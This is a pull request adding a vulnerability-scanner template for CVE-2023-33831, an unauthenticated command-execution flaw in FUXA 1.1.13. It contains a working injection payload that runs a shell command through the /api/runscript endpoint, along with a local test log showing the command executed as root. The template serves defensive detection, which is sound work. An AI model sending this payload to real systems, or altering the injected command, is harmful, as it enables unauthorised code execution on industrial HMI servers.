### PR TITLE
Create CVE-2023-33831.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-33831.yaml
+++ b/http/cves/2023/CVE-2023-33831.yaml
@@ -1,0 +1,47 @@
+id: CVE-2023-33831
+
+info:
+  name: FUXA - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: |
+    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33831
+    - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-33831
+    cwe-id: CWE-77
+    epss-score: 0.003140000
+    epss-percentile: 0.667090000
+    cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
+  tags: cve,cve2023,rce,frangoteam,fuxa,unauth
+
+http:
+  - raw:
+      - |
+        POST /api/runscript HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{randstr}}')"}}}
+
+      - |
+        GET /_images/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'uid'
+          - 'gid'
+          - 'groups'
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2023/CVE-2023-33831.yaml
+++ b/http/cves/2023/CVE-2023-33831.yaml
@@ -21,7 +21,7 @@ info:
     fofa-query: title="FUXA"
     max-request: 1
     verified: "true"
-  tags: cve,cve2023,rce,frangoteam,fuxa,unauth
+  tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
 
 variables:
   filename: "{{rand_base(6)}}"

--- a/http/cves/2023/CVE-2023-33831.yaml
+++ b/http/cves/2023/CVE-2023-33831.yaml
@@ -17,7 +17,14 @@ info:
     epss-score: 0.003140000
     epss-percentile: 0.667090000
     cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:*
+  metadata:
+    fofa-query: title="FUXA"
+    max-request: 1
+    verified: "true"
   tags: cve,cve2023,rce,frangoteam,fuxa,unauth
+
+variables:
+  filename: "{{rand_base(6)}}"
 
 http:
   - raw:
@@ -26,16 +33,21 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{randstr}}')"}}}
+        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
 
       - |
-        GET /_images/{{randstr}} HTTP/1.1
+        GET /_images/{{filename}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
+        words:
+          - 'Script OK:'
+
+      - type: word
+        part: body_2
         words:
           - 'uid'
           - 'gid'


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-33831

```
A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
```

- References: https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
$ nuclei -t CVE-2023-33831.yaml -u http://127.0.0.1:1881 --debug

POST /api/runscript HTTP/1.1
Host: 127.0.0.1:1881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 299
Content-Type: application/json
Accept-Encoding: gzip

{"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/2WAYViw731oJa8XfifgqrYSMSte')"}}}
[DBG] [CVE-2023-33831] Dumped HTTP response http://127.0.0.1:1881/api/runscript

HTTP/1.1 200 OK
Connection: close
Content-Length: 15
Access-Control-Allow-Headers: x-access-token, x-auth-user, Origin, Content-Type, Accept
Access-Control-Allow-Methods: GET,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Sun, 01 Oct 2023 16:14:36 GMT
Etag: W/"f-BqamX8Agir75c+0ZN7SeQyFMRm0"
X-Powered-By: Express

"Script OK: ok"
[INF] [CVE-2023-33831] Dumped HTTP request for http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte

GET /_images/2WAYViw731oJa8XfifgqrYSMSte HTTP/1.1
Host: 127.0.0.1:1881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2023-33831] Dumped HTTP response http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte

HTTP/1.1 200 OK
Connection: close
Content-Length: 51
Accept-Ranges: bytes
Access-Control-Allow-Headers: x-access-token, x-auth-user, Origin, Content-Type, Accept
Access-Control-Allow-Methods: GET,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0
Content-Type: application/octet-stream
Date: Sun, 01 Oct 2023 16:14:36 GMT
Etag: W/"33-18aec052b1f"
Last-Modified: Sun, 01 Oct 2023 16:14:36 GMT
X-Powered-By: Express


00000000  75 69 64 3d 30 28 72 6f  6f 74 29 20 67 69 64 3d  |uid=0(root) gid=|
00000010  30 28 72 6f 6f 74 29 20  67 72 6f 75 70 73 3d 30  |0(root) groups=0|
00000020  28 72 6f 6f 74 29 2c 31  34 33 28 64 6f 63 6b 65  |(root),143(docke|
00000030  72 29 0a                                          |r).|
[CVE-2023-33831:word-1] [http] [critical] http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte
[CVE-2023-33831:status-2] [http] [critical] http://127.0.0.1:1881/_images/2WAYViw731oJa8XfifgqrYSMSte
```

![image](https://github.com/projectdiscovery/nuclei-templates/assets/29292618/08e1c820-e59c-47ce-8043-e75dca849c85)
